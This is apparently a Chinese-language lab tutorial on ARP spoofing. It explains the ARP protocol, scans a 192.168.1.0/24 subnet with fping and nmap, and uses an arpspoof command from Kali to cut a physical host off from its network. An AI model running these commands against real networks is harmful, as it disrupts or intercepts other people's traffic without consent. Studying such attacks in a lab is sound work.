目录
2)kali选择网卡 需要ifconfig与物理机在同一网段(注意)
一、ARP协议
ARP(Address Resolution Protocol)地址解析协议,目的是实现IP地址到MAC地址的转换。
在计算机间通信的时候,计算机要知道目的计算机是谁(就像我们人交流一样,要知道对方是谁),这中间需要涉及到MAC地址,而MAC是真正的电脑的唯一标识符。
为什么需要ARP协议呢?因为在OSI七层模型中,对数据从上到下进行封装发送出去,然后对数据从下到上解包接收,但是上层(网络层)关心的IP地址,下层关心的是MAC地址,这个时候就需要映射IP和MAC。
二、环境准备
大环境:物理机+kali
小工具:namp/fping+arpspoof
三、断网攻击原理
图解ARP协议(二)ARP攻击原理与实践 - 知乎 (zhihu.com)https://zhuanlan.zhihu.com/p/367998688
四、废话不多,开干开干
1)物理机查看网段以及被攻击ip
2)kali选择网卡 需要ifconfig与物理机在同一网段(注意)
3)kali扫描网段存活主机
fping命令
fping -g 192.168.1.0/24
nmap命令(扫描不到物理机,因为是宿主机)
nmap -sP 192.168.1.0/24
推荐此实验使用,fping
4)观察物理机是否能上网(可以)
5)攻击命令 eth0是与物理机ip处在同一网段的网卡
sudo arpspoof -i eth0 -t 物理机ip 网关ip
6)成功断网